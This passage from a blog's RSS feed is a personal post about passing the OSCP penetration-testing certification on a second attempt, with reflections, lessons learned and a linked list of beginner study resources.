&lt;p&gt;I contacted support to fail me so I could immediately schedule my next exam attempt. They were very obliging so after submitting my report, they sent instructions for the exam retake. The exam report was not necessary but I wanted experience on writing a proper one and I needed feedback on my performance.&lt;/p&gt;

&lt;p&gt;The following days were spent in dejection. Fear of failure was greater than before. I was haunted. But hope was there. I reviewed my weak areas and prepared accordingly. My confidence was slowly restored. Doubt still lingered but I had to forge ahead in spite of it.&lt;/p&gt;

&lt;p&gt;Exam day came again. This time it went better. The preparations safeguarded me from previous pitfalls. On this attempt I went back to my roots, and got enough points to pass and remembered to secure screenshots! Writing the report for the second time was easier with the insights I learned from the first attempt. Three hours before the submission, the reports were finished, archived, uploaded and sent for review.&lt;/p&gt;

&lt;h3 id=&quot;paradiso&quot;&gt;Paradiso&lt;/h3&gt;

&lt;p&gt;The following day, Offsec sent this:
&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/passed.png&quot; alt=&quot;passed&quot; /&gt;&lt;/p&gt;

&lt;p&gt;It feels great to be OSCP. But honestly, I still feel like a &lt;em&gt;script kiddie&lt;/em&gt; in the sense that I still have a lot of things to learn.&lt;/p&gt;

&lt;p&gt;And that is what drives me, &lt;strong&gt;learning&lt;/strong&gt;. You would suspect that being acknowledged for hard work would imbue a greater sense of self-worth. But it is more correct to say that having been shown the great expanse of the InfoSec field made me more aware and more excited for my education.&lt;/p&gt;

&lt;p&gt;Achieving the highly regarded certification is no easy undertaking as it had drawn out potential I never thought I had. In the past I was satisfied with the rate at which I educated myself. My usual routine would be to gather free studying material on any topic I would fancy and go through them at a steady pace. After having grasped the material, it was tested out at my home lab. But with the PWK course, this process was exaggerated. I am tempted to say that the way I did things may have had a role to play, but the course’s difficulty, for the common security enthusiast, is the main factor in driving growth.&lt;/p&gt;

&lt;h3 id=&quot;lessons-learned&quot;&gt;Lessons Learned&lt;/h3&gt;

&lt;p&gt;Offensive Security is known to urge people to &lt;em&gt;“Try Harder!”&lt;/em&gt; But I think their other pithy, golden phrase receives less emphasis: &lt;em&gt;“Stay Humble!”&lt;/em&gt; Abandon hope as if you’re starting humbly from scratch. Then take on the challenges. With each challenge overcome is hope regained. Failing is fine just as failure of fear is also fine. Just make sure to do better next time.&lt;/p&gt;

&lt;p&gt;I really enjoyed the course. Through it I proved I can be better. Most importantly, I gained new friends. I’d like to thank my study buddies at slack for their company and insights, my family, friends, and my girlfriend for all the encouragement and support. This is not yet the end so I hope I can depend on you again next time!&lt;/p&gt;

&lt;h3 id=&quot;study-materials&quot;&gt;Study Materials&lt;/h3&gt;
&lt;p&gt;For a complete beginner, I believe the materials below will help in preparing for the course. The more time invested, the closer to getting OSCP certified.&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;a href=&quot;https://www.vulnhub.com/&quot;&gt;Vulnhub&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://exploit-exercises.com/&quot;&gt;Exploit Exercises&lt;/a&gt; - these helped me study for Buffer Overflows and SUID/SGID vulnerabilities&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;http://www.abatchy.com/2017/02/oscp-like-vulnhub-vms.html&quot;&gt;OSCP-like Vulnhub VMs&lt;/a&gt; - I finished the beginner friendly and intermediate VMs before taking the exam.&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://www.cybrary.it/&quot;&gt;Cybrary&lt;/a&gt; - I did not use this resource but beginners would find this very useful.&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w&quot;&gt;LiveOverflow&lt;/a&gt; - Awesome video tutorials. Because of his videos, I grew to love GDB over any debugger.&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://www.youtube.com/user/GynvaelEN/videos&quot;&gt;GynvaelEN&lt;/a&gt; - His videos might be advanced but informative.&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://www.gitbook.com/book/xapax/security/details&quot;&gt;Xapax’s Security Notepad&lt;/a&gt; - An excellent compendium of notes. Useful in Windows Exploitation.&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/&quot;&gt;Basic Linux Privilege Escalation&lt;/a&gt; - a well known guide to Linux privesc. It can be argued that a lot of people, whether taking OSCP or not, owe something to this guide.&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;http://www.fuzzysecurity.com/tutorials/16.html&quot;&gt;Windows Privilege Escalation Fundamentals&lt;/a&gt; - another well known guide for Windows privesc.&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://highon.coffee/&quot;&gt;HighOn.Coffee&lt;/a&gt; - excellent resource for Web Vulnerabilities and attacks.&lt;/li&gt;
&lt;/ul&gt;

</description>
        
          <description>&lt;p&gt;&lt;em&gt;This post took some time to write as I had my laptop’s keyboard fixed. In my eagerness to reach for water, I spilled it over my keyboard. If this happened during my exam, my bowels would have dropped with biblical magnitude.&lt;/em&gt;&lt;/p&gt;

</description>
        
        <pubDate>Tue, 17 Oct 2017 00:00:00 +0000</pubDate>
        <link>https://basicinfosecurity.github.io//blog/OSCP-and-Me/</link>
        <guid isPermaLink="true">https://basicinfosecurity.github.io//blog/OSCP-and-Me/</guid>
        
        
      </item>
      
    
  </channel>
</rss>
